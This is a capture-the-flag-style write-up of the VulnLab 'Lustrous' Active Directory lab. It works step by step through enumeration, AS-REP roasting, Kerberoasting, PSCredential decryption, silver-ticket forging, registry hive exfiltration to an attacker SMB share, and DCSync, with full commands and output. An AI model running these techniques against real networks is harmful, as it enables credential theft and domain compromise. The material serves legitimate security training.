Post

VulnLab Lustrous

VulnLab Lustrous

Posted Updated
Preview Image
By 0x13hrafnulf
10 min read
VulnLab Lustrous

Lustrous

Recon

1
2
3
4

└─$ rustscan -g -a 10.10.190.69,10.10.190.70 -r 1-65535
10.10.190.69 -> [21,53,80,88,135,139,389,443,445,464,593,636,3269,3268,3389,5985,9389]
10.10.190.70 -> [135,139,445,3389,5985]


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68

└─$ nmap -sC -sV -p21,53,80,88,135,139,389,443,445,464,593,636,3269,3268,3389,5985,9389 10.10.190.69          
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-14 23:43 +05
Nmap scan report for 10.10.190.69
Host is up (0.090s latency).

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_12-26-21  11:50AM       <DIR>          transfer
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-14 18:42:03Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: lustrous.vl0., Site: Default-First-Site-Name)
443/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn: 
|_  http/1.1
|_http-title: Not Found
| ssl-cert: Subject: commonName=LusDC.lustrous.vl
| Subject Alternative Name: DNS:LusDC.lustrous.vl
| Not valid before: 2021-12-26T09:46:02
|_Not valid after:  2022-12-26T00:00:00
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: lustrous.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=LusDC.lustrous.vl
| Not valid before: 2025-01-13T18:30:47
|_Not valid after:  2025-07-15T18:30:47
|_ssl-date: 2025-01-14T18:42:50+00:00; -1m20s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: LUSTROUS
|   NetBIOS_Domain_Name: LUSTROUS
|   NetBIOS_Computer_Name: LUSDC
|   DNS_Domain_Name: lustrous.vl
|   DNS_Computer_Name: LusDC.lustrous.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-01-14T18:42:11+00:00
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: LUSDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: -1m20s, deviation: 0s, median: -1m20s
| smb2-time: 
|   date: 2025-01-14T18:42:11
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.28 seconds


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

└─$ nmap -sC -sV -p135,139,445,3389,5985 10.10.190.70

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-14 23:35 +05
Nmap scan report for 10.10.190.70
Host is up (0.089s latency).

PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-01-14T18:35:12+00:00; -1m20s from scanner time.
| ssl-cert: Subject: commonName=LusMS.lustrous.vl
| Not valid before: 2025-01-13T18:30:47
|_Not valid after:  2025-07-15T18:30:47
| rdp-ntlm-info: 
|   Target_Name: LUSTROUS
|   NetBIOS_Domain_Name: LUSTROUS
|   NetBIOS_Computer_Name: LUSMS
|   DNS_Domain_Name: lustrous.vl
|   DNS_Computer_Name: LusMS.lustrous.vl
|   DNS_Tree_Name: lustrous.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-01-14T18:34:32+00:00
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-01-14T18:34:34
|_  start_date: N/A
|_clock-skew: mean: -1m20s, deviation: 0s, median: -1m20s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.34 seconds

LusMS.lustrous.vl

There’s https port open, but it returns 401. But we also have FTP service running, where we can anonymously login. There we find user directories. We can try stealing hash, but it doesn’t work.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

└─$ ftp anonymous@10.10.190.69 
Connected to 10.10.190.69.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||50101|)
125 Data connection already open; Transfer starting.
12-26-21  11:50AM       <DIR>          transfer
226 Transfer complete.
ftp> cd transfer
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50102|)
125 Data connection already open; Transfer starting.
12-26-21  11:51AM       <DIR>          ben.cox
12-26-21  11:49AM       <DIR>          rachel.parker
12-26-21  11:49AM       <DIR>          tony.ward
12-26-21  11:50AM       <DIR>          wayne.taylor
226 Transfer complete.
ftp>

So let’s create user list and check if any of the users is vulnerable AS-REP Roasting

1
2
3
4
5
6
7
8

└─$ GetNPUsers.py -usersfile usernames.txt -outputfile asrep.hash -request -format hashcat -dc-ip 10.10.190.69 lustrous.vl/
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

$krb5asrep$23$ben.cox@LUSTROUS.VL:a14ef6711f8206102adece1f066e7297$cf54c1df0a2a3f5034a422d43d675e2828857da3f6163b23bd5d019d14208f152dcf1aca65cf322d1dc76d7da3be309ef112d1185280f1b73947291cbe4c3f7ced3967c35037433ada2ef2bedc432683fa726b67193f7e310cd797337064ddd7e52fd44baf8d40bc3e6131e498aa5e1dd8c6b58256e116d02a4e0b9c654b641e6240d2995c074da096ce69c8881264ecaaf45882453f7a416a726805ba4e0f976e4e943baec72fed4b4f767a57251ae4b8293d570f4d2f3883bc8ca1560f35b0d65862f20b452f40cc9aff7ae9b8ebdc8442c33793bdaf7a7f31406e81dd1027a539afcbac97f53119ad
[-] User rachel.parker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User tony.ward doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wayne.taylor doesn't have UF_DONT_REQUIRE_PREAUTH set

Crack it

1
2
3
4
5
6

└─$ hashcat -m 18200 -a 0 asrep.hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting
<SNIP>
$krb5asrep$23$ben.cox@LUSTROUS.VL:a14ef6711f8206102adece1f066e7297$cf54c1df0a2a3f5034a422d43d675e2828857da3f6163b23bd5d019d14208f152dcf1aca65cf322d1dc76d7da3be309ef112d1185280f1b73947291cbe4c3f7ced3967c35037433ada2ef2bedc432683fa726b67193f7e310cd797337064ddd7e52fd44baf8d40bc3e6131e498aa5e1dd8c6b58256e116d02a4e0b9c654b641e6240d2995c074da096ce69c8881264ecaaf45882453f7a416a726805ba4e0f976e4e943baec72fed4b4f767a57251ae4b8293d570f4d2f3883bc8ca1560f35b0d65862f20b452f40cc9aff7ae9b8ebdc8442c33793bdaf7a7f31406e81dd1027a539afcbac97f53119ad:<REDACTED>
<SNIP>


1
2
3

└─$ nxc smb 10.10.190.69 -u 'ben.cox' -p '<REDACTED>'                                              
SMB         10.10.190.69    445    LUSDC            [*] Windows Server 2022 Build 20348 x64 (name:LUSDC) (domain:lustrous.vl) (signing:True) (SMBv1:False)
SMB         10.10.190.69    445    LUSDC            [+] lustrous.vl\ben.cox:<REDACTED>

Let’s also check Kerberoastable users

1
2
3
4
5
6
7
8
9
10
11
12
13
14

└─$ GetUserSPNs.py lustrous.vl/ben.cox:'<REDACTED>' -dc-ip 10.10.190.69 -request -outputfile kerb.hash
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName     Name     MemberOf  PasswordLastSet             LastLogon                   Delegation 
-----------------------  -------  --------  --------------------------  --------------------------  ----------
http/lusdc               svc_web            2021-12-22 18:46:12.670282  2025-01-14 23:42:12.263803             
http/lusdc.lustrous.vl   svc_web            2021-12-22 18:46:12.670282  2025-01-14 23:42:12.263803             
MSSQL/lusdc              svc_db             2021-12-22 18:46:34.170590  <never>                                
MSSQL/lusdc.lustrous.vl  svc_db             2021-12-22 18:46:34.170590  <never>                                



[-] CCache file is not found. Skipping...

Crack

1
2
3
4
5
6

└─$ hashcat -m 13100 -a 0 kerb.hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting
<SNIP>
$krb5tgs$23$*svc_web$LUSTROUS.VL$lustrous.vl/svc_web*$db1590764321cd59bbbf1fcf1632f806$fbe493b6e06a5d7d4bf531d3f1dbcf73f8be7076be675a61dd0aa96052ff1dc69df49983a7d2b7ad0457d6d73896d2487610999b7701660fd0d021123def972207a03023b13fa7e809bb88dbf93459766764a045894178ca852b7da7f30e6ffce2ea518878e639adfc3fecf1c53cd11c970270eb16cbffd9dd8e8a63022cea07ff6fb3196493c453091682d4c554b8c17e049ca834fcec7ed16a6aa1b00da34a5f6f0a0a048b2cca210e20b61434e30b81da35dba70a8aaee5a95a41d337f2ccddb9273f93385ad67e6893b1ee62ccd6f427982e849daca8d46d5566eddc380a7acdf50619657e0e94282cd1f7c5cad853b6e9b90a1a11e754d4faef3618da2b145a06ff7a5b7df9a64a40989d50afa2bb8e0eb2dca4d8e8ac35cf50cc39143ceb26a38d71f7fc0025ca5022cb0940a0eef1a48777f94227fa9bc82ef5148358d97aaeb0afab6a6d83f66140fe4817a11a4206ba70e09a710e3656cd75d8cec6e0d4c114ef8a7a4a799c7d3c0d558b1efd9181344bc4a8f2d01f26d8433e120fbc97f0e2cb7c37b671f01803050f770ca41360a713cc29fc6475ea1cdb2ac5b2fb649d9b32e682746a5a53f75cff3823fd1ee9daac93174f912cd5129cb17bec9ad0181bf6e97ee733beeb7f035edf859c79bae428b2a8ada78cf2a1d8b409b7a32551928b1de60cfab55eb1d5e808582c53968bec9a1f8de13bfce188edaa96ebc2c3b955bbb86e28f090eefbab049926dae9921d17862a99d295d33c9918d4e80ca9fa8d2e4aadc3ced00fcf48b824156feb89e6f65f4a1a0aaae48c60d172658c340a5989d9a5860998df464508c27c5ca474c4f9a961028275d2b13a8eeaebc512c1799fe40b0d163f81e83c46eb07678f8ed95a2330b0593f56a93bb9b8d0013d8901965342089273e8d0a2a522569603c845c821bd7b63f253d900fa0b2ac2a4d68791ddaffadf89fdc0746b0f9f4fdd0c7b665aa4951cff9010f208b6a1876b4b0788eddc268ea3dc61bffc08d997cb2b7161d53df8c637e8966af1f76b742d8414a2859186f5e9c1d30fe883f5f9236b0020fe0f2de4cdb1194c8ee6b275c5bf68df100108ad5be5ae806e839b3151fbf1dada76c0132f3284fb9b3ade63ed499b3c791c3d5d6929a07adb60dfcbdab6dc1153569d3142d56eee8cc55e52a75e34c2933e9fa17683e9520569b4384f83de92fe8312509780798142b924a2e7866d581cae2adb16564b1b98abfc6432fbc33cab0916451dc281c2c5c32bb60a8bd3deecd69cd64f7241efd72e769df2cfba56ad80f00baea3b1091f4ec6a98e12c6ec71b8da6cb0e49fe1a5141b721e6c7ccd8b8c8d25445db70a6627fdfa9a94f48aaecca172c71ef2a8785852977e86fb262f8f390a1ae4b581108381ced1f6e2cc3be3f2bb134a99984225f639162ed00cefd6521cd5c012de4cc774aad6:<REDACTED>
<SNIP>

Let’s capture domain info with bloodhound

1

└─$ bloodhound-python -d 'lustrous.vl' -u 'ben.cox' -p '<REDACTED>' -c all -ns 10.10.190.69 --zip

ben.cox can PSRemote

We can connect to LUSMS

1
2
3
4
5
6
7
8
9
10

└─$ evil-winrm -i 10.10.190.70 -u 'ben.cox' -p '<REDACTED>'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ben.cox\Documents>

We find admin.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

*Evil-WinRM* PS C:\Users\ben.cox> ls desktop


    Directory: C:\Users\ben.cox\desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        12/26/2021  10:30 AM           1652 admin.xml

*Evil-WinRM* PS C:\Users\ben.cox> cat desktop\admin.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">LUSMS\Administrator</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367</SS>
    </Props>
  </Obj>
</Objs>

We can decrypt it by following:

  • https://stackoverflow.com/questions/63639876/powershell-password-decrypt
  • https://systemweakness.com/powershell-credentials-for-pentesters-securestring-pscredentials-787263abf9d8
  • https://exploit-notes.hdks.org/exploit/cryptography/algorithm/powershell-credentials/
1
2
3
4
5
6

*Evil-WinRM* PS C:\Users\ben.cox> $EncString = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367"
*Evil-WinRM* PS C:\Users\ben.cox> $SecureString = ConvertTo-SecureString $EncString
*Evil-WinRM* PS C:\Users\ben.cox> $Credential = New-Object System.Management.Automation.PSCredential -ArgumentList "LUSMS\Administrator",$SecureString
*Evil-WinRM* PS C:\Users\ben.cox> $password = echo $Credential.GetNetworkCredential().password
*Evil-WinRM* PS C:\Users\ben.cox> $password
<REDACTED>

We can connect as administrator using the creds

1
2
3
4
5
6
7
8
9
10

└─$ evil-winrm -i 10.10.190.70 -u administrator -p '<REDACTED>'   
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

LusDC.lustrous.vl

Nothing interesting inside. Remember we had 401 error when visiting https service running on lusdc.lustrous.vl, when we try accessing from LusMS we receive login prompt

We can use ben.cox credentials. Seems like it stores user notes.

During roasting attacks, we saw svc_web user with spn http/lusdc.lustrous.vl, which probably runs web server. We were able to crack the hash, so no we can try performing Silver-Ticket attack. To perform thi attack we need:

  • NTLM hash of the service account
  • Domain SID
  • SPN of the service: http/lusdc.lustrous.vl

Convert password to NTLM

1
2
3

└─$ iconv -f ASCII -t UTF-16LE <(printf "<REDACTED>") | openssl dgst -md4
MD4(stdin)= <REDACTED>

We can retrieve Domain SID using lookupsid.py or via Powerview’s Get-DomainSID cmdlet or bloodhound

1
2
3
4
5
6
7
8
9

└─$ lookupsid.py lustrous/ben.cox:'<REDACTED>'@10.10.252.165

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Brute forcing SIDs at 10.10.252.165
[*] StringBinding ncacn_np:10.10.252.165[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2355092754-1584501958-1513963426

<SNIP>

Then we can generate ticket and pass it to the current session using Rubeus or mimikatz. Note that the host has Windows Defender enabled, so either disable it/add exception path or any other way.

The final command for Rubeus

1

Rubeus.exe silver /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl  /service:http/lusdc.lustrous.vl /rc4:<REDACTED> /user:<USERNAME> /id:<RID> /ptt /nowrap

Or mimikatz

1
2

privilege::debug
kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /ptt /target:lusdc.lustrous.vl /service:http /rc4:<REDACTED> /user:<USERNAME>

It works

Now let’s access it via powershell by using http://lusdc.lustrous.vl/Internal url, which contained all notes

1

Invoke-WebRequest -Uri http://lusdc.lustrous.vl/Internal -UseDefaultCredentials -UseBasicParsing | Select-Object -Expand Content

Nothing useful. There’s tony.ward who is a member of Backup Operators group. We can check his notes

Seems like there are creds

Now we can use RegSave or reg.py by impacket. Let’s use impacket

1
2
3
4
5
6
7
8

└─$ smbserver.py -smb2support "dump" "./"     
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed

Retrieve secrets

1
2
3
4
5
6

└─$ reg.py lustrous/tony.ward:'<REDACTED>'@lusdc.lustrous.vl backup -o '\\10.8.4.147\dump'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saved HKLM\SAM to \\10.8.4.147\dump\SAM.save
[*] Saved HKLM\SAM to \\10.8.4.147\dump\SYSTEM.save
[*] Saved HKLM\SECURITY to \\10.8.4.147\dump\SECURITY.save

But it can fail due to timeout, so we can also use tool by who4m1

1

└─$ x86_64-w64-mingw32-g++ ./BackupOperators.cpp -o BackupOperators

Upload to host and run it

1
2
3
4

PS C:\windows\tasks> .\BackupOperators.exe
Dumping SAM hive to C:\windows\temp\sam.hive
Dumping SYSTEM hive to C:\windows\temp\system.hive
Dumping SECURITY hive to C:\windows\temp\security.hive

Download secrets from DC, they were saved to C:\Windows\Temp

1
2
3
4
5
6
7
8

└─$ smbclient.py lustrous/tony.ward:'<REDACTED>'@lusdc.lustrous.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

# use C$
# get windows\temp\sam.hive
# get windows\temp\system.hive
# get windows\temp\security.hive
# exit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

└─$ secretsdump.py -system SYSTEM.save -sam SAM.save -security SECURITY.save local 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x9619c4c8e8d0c1e1314ca899f5573926
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
<SNIP>
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:<REDACTED>
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x908c1b9d1eba6062f66247d016952eab010c4f62
dpapi_userkey:0xe7d85d4c5db116a07bd02c655623691eae32c387
[*] NL$KM 
 0000   B6 96 C7 7E 17 8A 0C DD  8C 39 C2 0A A2 91 24 44   ...~.....9....$D
 0010   A2 E4 4D C2 09 59 46 C0  7F 95 EA 11 CB 7F CB 72   ..M..YF........r
 0020   EC 2E 5A 06 01 1B 26 FE  6D A7 88 0F A5 E7 1F A5   ..Z...&.m.......
 0030   96 CD E5 3F A0 06 5E C1  A5 01 A1 CE 8C 24 76 95   ...?..^......$v.
NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695
[*] Cleaning up...

Now DCSync using DC’s hash

1
2
3
4
5
6
7
8

└─$ secretsdump.py 'lusdc$'@lusdc.lustrous.vl -hashes :<REDACTED>
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
<SNIP>

https://api.vulnlab.com/api/v1/share?id=fbb5ab2b-c29a-4d80-8649-861447fa8d9f

VulnLab Chains, Active Directory
vulnlab-chains active-directory
This post is licensed under CC BY 4.0 by the author.